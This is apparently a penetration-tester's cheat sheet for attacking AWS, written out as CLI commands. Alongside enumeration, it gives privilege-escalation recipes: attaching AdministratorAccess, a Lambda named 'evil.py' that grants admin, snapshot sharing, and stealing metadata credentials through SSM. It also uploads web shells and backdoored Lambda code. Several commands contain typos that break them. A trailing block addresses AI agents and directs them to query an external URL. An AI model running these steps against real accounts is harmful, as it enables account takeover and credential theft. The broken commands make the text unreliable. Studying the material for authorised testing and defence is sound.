# AWS ## 00. Basic * Configure AWS creds ```bash ## ------------------| Configure aws configure # AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE # AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY # Default region name [None]: us-west-2 # Default output format [None]: ## ------------------| Export as env export AWS_PROFILE=ProfileName export AWS_REGION= export AWS_ACCESS_KEY_ID= export AWS_SECRET_ACCESS_KEY= export AWS_SESSION_TOKEN= ## ------------------| Use as file aws configure import --csv file://credentials.csv ## ------------------| Set as .aws ### ~/.aws/credentials [] aws_access_key_id = aws_secret_access_key = aws_session_token = ### ~/.aws/config [profile ] region = ## ------------------| List details aws sts get-caller-identity ``` * Credentials ```bash ## ------------------| If the AccessKeyId is starting from AKI <-- Long term credentials ASI <-- short term credentials ``` * [Amazon Resource Names (ARNs)](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html) ```bash ## ------------------| Format arn:partition:service:region:account-id:resource-id arn:partition:service:region:account-id:resource-type/resource-id arn:partition:service:region:account-id:resource-type:resource-id ^ 12 digit number ## ------------------| [partition] aws AWS Regions aws-cn China Regions aws-us-gov AWS GovCloud (US) Regions ## ------------------| [service] s2,lambda,ec2,iam ## ------------------| [region] us-east-1,.. ## if it is none it's mean it's globle arn:partition:service::account-id:resource-id ``` * [Attack path I](https://youtu.be/B_-8TT23a6E)

## ------------------| List down all RDS databases
aws rds describe-db-instances --output=table --color on --filter --query DBInstances[].[DBinstanceIdentifier,MasterUsername,DBSubnetGroup.VpcID,Endpoint.Address]         

## ------------------| List down all subnets
aws rds describe-db-instances --output=table --color on --filter --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier

## ------------------| Examine selected database subnets 
aws rds describe-db-instances --output=table --color on --filter "Name=db-instance-id,Values=<DBName>" --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier

## ------------------| List down all NACLs
aws ec2 describe-network-acls --output=table --color on --filter --query NetworkAcls[].Entries
## |0.0.0.0/0| True | -1 | allow | 100 | << Open for all

## ------------------| For selected subnets; What traffic do network access control lists (NACLs) allow?
aws ec2 describe-network-acls --output=table --color on --filter "Name=association.subnet-id,Values=subnet-0a7f04b97a6ed9b11" --query NetworkAcls[].Entries

## ------------------| What traffic do DB security groups allow?
aws ec2 describe-security-groups --output=table --color onaw
aws ec2 describe-security-groups --output=table --color on --filter "Name=groupid,Values=sg-0a7f04b97a6ed9b11" | less

## ------------------| Find VPC with access to database
aws ec2 describe-vpcs --output=table --color on
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16"
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16" --query Vpcs[].VpcId

## ------------------| VPC security group [port 3306 egress]
aws ec2 describe-security-groups  --output=table --color on --filter "Name=ip-permission.to-port,Values=3306"
aws ec2 describe-security-groups  --output=table --color on --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --filter "Name=ip-permission.to-port,Values=22" --query 'SecurityGroups[].GroupId'

## ------------------| Check Lambda functions
aws lambda list-functions --output=table --color on 
aws lambda list-functions --output=table --color on --query Functions[?VpcConfig.SecurityGroupIds==[`sg-07d51f986796059f9`]].FunctionName

## ------------------| Query to download Lambda source code
aws lambda get-function --function-name <FunctionName> --query Code.Location

## ------------------| List all ec2s which has public IP (Look for instance that can exfi) l 
aws ec2 describe-instances --output text --query Reservations[].Instances[].NetworkInterfaces[].Association.[PublicIp,PublicDnsName]

## ------------------| Find No outbound restrictions security groups
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --query SecurityGroups[].GroupId
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --filter "Name=vpc-id,Values=<VPCId>" --query SecurityGroups[].GroupId

## 01. IAM (Identity and Access Management) ### 01.0 Users ```bash ## ------------------| List all users aws iam list-users aws iam list-users --output table --query Users[].[UserName,Arn,UserId] ## ------------------| Enumarate groups for users aws iam list-groups-for-user --user-name for i in $(aws iam list-users --query Users[].UserName --output text);do aws iam list-groups-for-user --user-name $i;done ## ------------------| List all inline policies aws iam list-user-policies --user-name ## ------------------| Lists all managed policies aws iam list-attached-user-policies --user-name ## ------------------| Enumarate user's signing certificates aws iam list-signing-certificates --user-name for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam list-signing-certificates --user-name $i --output json;done ## ------------------| Check for public ssh keys for user. aws iam get-ssh-public-key --user-name --encoding --ssh-public-key-id ## ------------------| Check for Multi Factor Auth for user aws iam list-virtual-mfa-devices aws iam list-mfa-devices --user-name for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam list-mfa-devices --user-name $i --output json;done ## ------------------| Check if the user have console login profile aws iam get-login-profile --user-name for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam get-login-profile --user-name $i;done ## ------------------| Create another access key aws iam create-access-key --user-name ``` ### 01.2 Groups ```bash ## ------------------| List all groups aws iam list-groups --output json ## ------------------| List all inline policies aws iam list-group-policies --group-name ## ------------------| Lists all managed policies aws iam list-attached-group-policies --group-name ``` ### 01.3 Roles

## ------------------| List all roles
aws iam list-roles --output json

## ------------------| List role information
aws iam get-role --role-name <RoleName> --output json 

## ------------------| Lists all attached policies
## arn:aws:sts::<account-id>:.../<RoleName>/...
aws iam list-attached-role-policies --role-name <RoleName>

## ------------------| List all inline policies.
aws iam list-role-policies --role-name <RoleName>

## ------------------| Assuming the role
aws sts assume-role --role-arn arn:aws:iam::<AccountID>role/<RoleName> --role-session-name AnyName

### 01.4 Policies ```bash ## ------------------| List all policies aws iam list-policies --output json aws iam list-policies --output json --scope Local aws iam list-policies --output json | grep Admin aws iam list-policies --output json --query Policies[].[PolicyName,PolicyId,Arn,DefaultVersionId] ## ------------------| List all inline policies aws iam list-user-policies --user-name for i in $(aws iam list-users --query Users[].UserName --output text);do aws iam list-user-policies --user-name $i;done ## ------------------| List all manage policies aws iam list-attached-user-policies --user-name for i in $(aws iam list-users --query Users[].UserName --output text);do echo -n "[$i]\t";aws iam list-attached-user-policies --user-name user22 --output text | awk '{print $2"\t"$3}';done ## ------------------| Check policy permissions / Find the DefaultVersionId aws iam get-policy --policy-arn :policy/ ## ------------------| Read the policy document aws iam get-policy-version --output json --policy-arn :policy/ --version-id ## ------------------| List details about inline policy document aws iam get-user-policy --user-name --policy-name aws iam get-group-policy --group-name --policy-name aws iam get-role-policy --role-name --policy-name ## ------------------| [If user has PutUserPolicy] Add an inline policy document that is embedded in the specified IAM user aws iam put-user-policy --user-name --policy-name --policy-document file://Policy.json ## ------------------| Policy.json { "Version": "2022-07-14", "Statement": [ { "Effect": "Allow", "Action": [ "*" ], "Resource": [ "*" ] } ] } ``` ### 01.5 [Privilege Escalation](https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation)

Required Permission	PrivilageEsc Methods
iam:AttachUserPolicy	Attaching a policy to a user
iam:AttachGroupPolicy	Attaching a policy to a group
iam:AttachRolePolicy	Attaching a policy to a role
iam:CreateAccessKey	Creating a new user access key
iam:CreateLoginProfile	Creating a new login profile
iam:UpdateLoginProfile	Updating an existing login profile
iam:PassRole ec2:RunInstances	Creating an EC2 instance with an existing instance profile
iam:PutUserPolicy	Creating/updating an inline policy for a user
iam:PutGroupPolicy	Creating/updating an inline policy for a group
iam:PutRolePolicy	Creating/updating an inline policy for a role
iam:AddUserToGroup	Adding a user to a group
iam:UpdateAssumeRolePolicy sts:AssumeRole	Updating the AssumeRolePolicyDocument of a role
iam:PassRole lambda:CreateFunction lambda:InvokeFunction	Passing a role to a new Lambda function, then invoking it
lambda:UpdateFunctionCode	Updating the code of an existing Lambda function

#### 01.5.1 Overly Permissive Permission * iam:AttachUserPolicy ```bash ## ------------------| Check if you have "Action": "iam:AttachUserPolicy" aws iam get-policy-version --policy-arn :policy/ --version-id ## ------------------| Find ARN for AdministratorAccess policy aws iam list-policies | grep "AdministratorAccess" ## ------------------| Attach policy for a user aws iam attach-user-policy --user-name --policy-arn arn:aws:iam::aws:policy/AdministratorAccess ## ------------------| Checking attached policies again aws iam list-attached-user-policies --user-name ``` * iam:CreateLoginProfile ```bash ## ------------------| Check if you have "Action": "iam:CreateLoginProfile" aws iam get-user-policy --user-name --policy-name ## ------------------| List all users aws iam list-users --output table --query Users[].[UserName,Arn,UserId] ## ------------------| View existing policies aws iam list-attached-user-policies --user-name ## ------------------| Creating login profile aws iam create-login-profile --user-name --password Passw0rd@123 --no-password-reset-required ``` * sts:AssumeRole ```bash ## ------------------| Check if you have sts:AssumeRole aws sts assume-role --role-arn --role-session-name --profile ### extrack the token to .aws ## ------------------| List all ebs snapshots aws ec2 describe-snapshots --owner-ids --region --profile ## ------------------| Exploit aws ec2 modify-snapshot-attribute --snapshot-id --attribute CreateVoulmePermission --operation-type add --user-ids --region --profile aws ec2 create-volume --snapshot-id --availability-zone --region --profile aws ec2 attach-voumne --device /dev/xvhd --instance-id --volume-id --region --profile ``` * iam:PassRole with lambda:CreateFunction ```bash ## ------------------| Check if we have rights to go ahead aws iam list-user-policies --user-name aws iam get-user-policy --user-name --policy-name ## ------------------| Finding lambda role details aws iam list-roles --output json aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "lambda.amazonaws.com" ## ------------------| Check policy details for lamda role for iam:AttachUserPolicy aws iam get-role --role-name --output json aws iam list-role-policies --role-name --output json aws iam get-role-policy --role-name --policy-name --output json ## ------------------| Creating lambda function (evil.py) import boto3 def h4rithd(event, context): iam = boto3.client("iam") response = iam.attach_user_policy( UserName="",PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" ) return response ## ------------------| Upload lambda function zip evil-function.zip evil.py aws lambda create-function --function-name evil-function --runtime python3.8 --zip-file fileb://evil-function.zip --handler evil.h4rithd --role iam:PassRole with ec2:RunInstances ```bash ## ------------------| List policies and check if we have access aws iam list-attached-user-policies --user-name aws iam list-user-policies --user-name aws iam get-user-policy --user-name --policy-name ## ------------------| List ec2 roles and get role name aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "ec2.amazonaws.com" ## ------------------| Listing policy details attached to role aws iam list-role-policies --role-name aws iam get-role-policy --role-name --policy-name ## ------------------| Find AMI id aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId' ## ------------------| Find subnet id aws ec2 describe-subnets ## ------------------| List security groups aws ec2 describe-security-groups ## ------------------| List instance profile name aws iam list-instance-profiles ## ------------------| Stat ec2 instance aws ec2 run-instance --subnet-id --image-id --iam-instance-profile Name= --instance-type t2.micro --security-group-ids "" ## ------------------| If you have SSM * aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials"]' --targets "Key=instanceids,Values=" --comment "This is comment" ## Copy the CommandID ## ------------------| Check the command's output aws ssm get-command-invocation --command-id "" --instance-id "" ``` #### 01.5.2 Dangerous policy combinations ```bash ## ------------------| List policies aws iam list-attached-user-policies --user-name aws iam list-user-policies --user-name aws iam get-user-policy --user-name --policy-name ``` ## 02. S3 (Simple Storage Service) ```bash ## ------------------| List all s3 bucktes aws s3api list-buckets aws s3 ls s3:// ## ------------------| Interact with s3 bucktes aws s3 ls s3:// ## ------------------| Get the information about specified bucket acls aws s3api get-bucket-acl --bucket ## ------------------| Get the information about specified bucket policy aws s3api get-bucket-policy --bucket ## ------------------| Retrieves the Public Access Block configuration for an Amazon S3 bucket aws s3api get-public-access-block --bucket ## ------------------| List of all the objects in specified bucket aws s3api list-objects --bucket ## ------------------| Get the acls information about specified object aws s3api get-object-acl --bucket --key ## ------------------| Copy file to bucket aws s3 cp /tmp/shell.php s3:///shell.php ## ------------------| List all directory aws --endpoint-url http://s3.bucket.htb s3 ls ## ------------------| List what inside the directory aws --endpoint-url http://s3.bucket.htb s3 ls aws --endpoint-url http://s3.bucket.htb s3 ls ## ------------------| Upload file/shell aws --endpoint-url http://s3.bucket.htb s3 cp shell.php s3:///shell.php ## ------------------| Create a bucket and enable versioning aws s3 mb s3://aws- --region --profile aws s3api put-bucket-versioning --bucket --versioning-configuration Status=Enabled --region --profile ``` ## 03. VPC (Virtual Private Cloud) ```bash ## ------------------| Get details aws ec2 describe-vpcs aws ec2 describe-vpcs --region aws ec2 describe-vpcs --filters "Name=vpc-id,Values=" ## ------------------| List Subnets aws ec2 describe-subnets aws ec2 describe-subnets --filters "Name=vpc-id, Values=" ## ------------------| List Route Table aws ec2 describe-route-tables aws ec2 describe-route-tables --filters "Name=vpc-id, Values=" ## ------------------| List Network ACLs aws ec2 describe-network-acls aws ec2 describe-network-acls --filters "Name=vpc-id, Values=" ## ------------------| List all VPC Peering Connections aws ec2 describe-vpc-peering-connections ## ------------------| List about EC2 Instances In the specified VPC aws ec2 describe-instances --filters “Name=vpc-id, Values=” ## ------------------| List about EC2 Instances In the specified Subnet aws ec2 describe-instances --filters “Name=subnet-id, Values=" ``` ## 04. EC2 (Elastic Compute Cloud) ```bash ## ------------------| List all Instances aws ec2 describe-instances aws ec2 describe-instances --region ## ------------------| List the Information about Specified Instance aws ec2 describe-instances --instance-ids ## ------------------| List the Information about UserData Attribute of the specified Instance aws ec2 describe-instance-attribute –attribute userData --instance-id ## ------------------| List the Information about IAM instance profile associations aws ec2 describe-iam-instance-profile-associations ## ------------------| Attach an instance profile with a role to a EC2 instance aws ec2 associate-iam-instance-profile --instance-id --iam-instance-profile Name= ## ------------------| AWS Metadata ### IMDV1 curl http://169.254.169.254/latest/meta-data/ curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/Role curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName\ curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance ### IMDV2 export TOKEN=$(curl -sS -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/ ## ------------------| AWS Userdata ### IMDV1 curl http://169.254.169.254/latest/user-data/ ### IMDV2 export TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/user-data/ ``` ## 05. EBS (Elastic Block Store) ```bash ## ------------------| List the Information about EBS volumes aws ec2 describe-volumes ## ------------------| List about all the available EBS snapshots aws ec2 describe-snapshots aws ec2 describe-snapshots --owner-ids self ## ------------------| Creates a snapshot of the specified volume aws ec2 create-snapshot --volume-id --description "Backup Snapshot" ## ------------------| Create a volume from snapshots aws ec2 create-volume --snapshot-id --availability-zone ## ------------------| Attach specified volume to the ec2-instance aws ec2 attach-volume --volume-id --instance-id --device ## ------------------| Mount Volume on EC2 file system sudo mount /mnt/backups ``` ## 06. EKS (Elastic Kubernetes Service) ![](broken-reference) ```bash ## ------------------| Describe about all the repositories in the container registry aws ecr describe-repositories ## ------------------| Get the information about repository policy aws ecr get-repository-policy --repository-name ## ------------------| Lists of all images in the specified repository aws ecr list-images --repository-name ## ------------------| Describe the information about a container image aws ecr describe-images --repository-name --image-ids imageTag=ImageTag ## ------------------| Lists all ECS Clusters aws ecs list-clusters ## ------------------| Describe information about specified cluster aws ecs describe-clusters --cluster ## ------------------| Lists all services in the specified cluster aws ecs list-services --cluster ## ------------------| Describe the information about a specified service aws ecs describe-services --cluster --services ## ------------------| Lists all tasks in the specified cluster aws ecs list-tasks --cluster ## ------------------| Describe the information about a specified task aws ecs describe-tasks --cluster --tasks ## ------------------| Lists all containers in the specified cluster aws ecs list-container-instances --cluster ## ------------------| Lists all EKS Clusters aws eks list-clusters ## ------------------| Describe the information about a specified cluster aws eks describe-cluster --name ## ------------------| List of all node groups in a specified cluster aws eks list-nodegroups --cluster-name ## ------------------| Describe the information about a specific node group in a cluster aws eks describe-nodegroup --cluster-name --nodegroup-name ## ------------------| List of all fargate in a specified cluster aws eks list-fargate-profiles --cluster-name ## ------------------| Describe the information about a specific fargate profile in a cluster aws eks describe-fargate-profile --cluster-name --fargate-profile-name ``` ## 07. RDS (Relational Database Service) ```bash ## ------------------| Describes the Information about the clusters in RDS aws rds describe-db-clusters ## ------------------| Describes the Information about the database instances in RDS aws rds describe-db-instances ## ------------------| Describes the Information about the subnet groups in RDS aws rds describe-db-subnet-groups ## ------------------| Describes the Information about the database security groups in RDS aws rds describe-db-security-groups ## ------------------| Describes the Information about the database proxies in RDS aws rds describe-db-proxies ``` ## 08. KMS (Key Management Server) ```bash ## ------------------| Lists of the all keys available in key management server (KMS) aws kms list-keys ## ------------------| Describes about specified key aws kms describe-key --key-id ## ------------------| Lists of policies attached to specified key aws kms list-key-policies --key-id ## ------------------| Get full information about a policy aws kms get-key-policy --policy-name --key-id ``` ## 09. Lambda * Functions ```bash ## ------------------| List all functions aws lambda list-functions --endpoint-url=http://cloud.epsilon.htb ## ------------------| Get code aws lambda get-function --function-name= --endpoint-url=http://cloud.epsilon.htb ## ------------------| Upload the backdoor updated code to aws lambda function aws lambda update-function-code --function-name --zip-file file://backdoor.zip ## ------------------| Get details for lambda function aws lambda get-function --function-name ## ------------------| Get details for the policy Information about the specified lambda function aws lambda get-policy --function-name ## ------------------| Get details for the event source mapping Information about the specified lambda function aws lambda list-event-source-mappings --function-name ## ------------------| List of all the layers (dependencies) in aws account aws lambda list-layers ## ------------------| Get details for the full Information about the specified layer name aws lambda get-layer-version --layer-name --version-number ## ------------------| Create a lambda function and attach role to this function aws lambda create-function --function-name --runtime --zip-file fileb://file.zip --handler --role --region ## ------------------| Invoke the lambda function aws lambda invoke --function-name response.json --region ``` * API Gateway ![](broken-reference) ```bash ## ------------------| List of all the Rest APIs aws apigateway get-rest-apis ## ------------------| Get the information about specified API aws apigateway get-rest-api --rest-api-id ## ------------------| Lists information about a collection of resources aws apigateway get-resources --rest-api-id ## ------------------| Get information about the specified resource aws apigateway get-resource --rest-api-id --resource-id ## ------------------| Get the method information for the specified resource aws apigateway get-method --rest-api-id --resource-id --http-method ## ------------------| List of all stages for a REST API aws apigateway get-stages --rest-api-id ## ------------------| Get the information about specified API's stage aws apigateway get-stage --rest-api-id --stage-name ## ------------------| List of all the API keys aws apigateway get-api-keys --include-values ## ------------------| Get the information about a specified API key aws apigateway get-api-key --api-key ``` ## 10. DynamoDB ```bash ## ------------------| List Tables aws --endpoint-url http://s3.bucket.htb dynamodb list-tables ## ------------------| Get stuff on the table aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name | jq . ## ------------------| Put stuff on the table aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name --item file://.json ## ------------------| Create table aws --endpoint-url http://s3.bucket.htb dynamodb create-table \ 255 ⨯ --table-name alerts \ --attribute-definitions AttributeName=title,AttributeType=S \ --key-schema AttributeName=title,KeyType=HASH \ --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 ``` ## 11. Secret Manager ```bash ## ------------------| Lists of the all secrets that are stored by Secrets Manager aws secretsmanager list-secrets ## ------------------| Describes about specified secret aws secretsmanager describe-secret --secret-id ## ------------------| Get the resource-based policy that is attached to the specified Secret aws secretsmanager get-resource-policy --secret-id ``` ## 12. [pacu](https://github.com/RhinoSecurityLabs/pacu) * Cross Account Enumerations

## ------------------| User Enumerations 
### Create assume-role.json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "sts:AssumeRole",
      "Condition": {}
    }
  ]
}
### Create the role
aws iam create-role -role-name AnyName --assume-role-policy-document file:///$(pwd)/assume-role.json    
### Start pacu and set the keys
run iam__enum_users --role-name AnyName --account-id <StolenAccountID>
run iam__enum_users --role-name AnyName --account-id <StolenAccountID>  --word-list username.txt

## ------------------| Role Enumerations
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID>
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID>  --word-list username.txt

## 13. [ScoutSuite](https://github.com/nccgroup/ScoutSuite) ```bash ## ------------------| Install git clone https://github.com/nccgroup/ScoutSuite && cd ScoutSuite virtualenv -p python3 venv && source venv/bin/activate pip install -r requirements.txt python scout.py --help ## ------------------| Enumerate python scout.py aws -p -r ``` ## 14. [PMapper](https://github.com/nccgroup/PMapper) ```bash ## ------------------| Install pip install principalmapper ## ------------------| Create a graph for the account, accessed through AWS CLI profile "skywalker" pmapper --profile skywalker graph create ## ------------------| Run a query to see who can make IAM Users pmapper --profile skywalker query 'who can do iam:CreateUser' ## ------------------| Run a query to see who can launch a big expensive EC2 instance, aside from "admin" users pmapper --account 000000000000 argquery -s --action 'ec2:RunInstances' --condition 'ec2:InstanceType=c6gd.16xlarge' ## ------------------| Run the privilege escalation preset query, skip reporting current "admin" users pmapper --account 000000000000 query -s 'preset privesc *' ## ------------------| Create an SVG representation of the admins/privescs/inter-principal access pmapper --account 000000000000 visualize --filetype ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://p0db0t.gitbook.io/pentest/cloud/aws.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.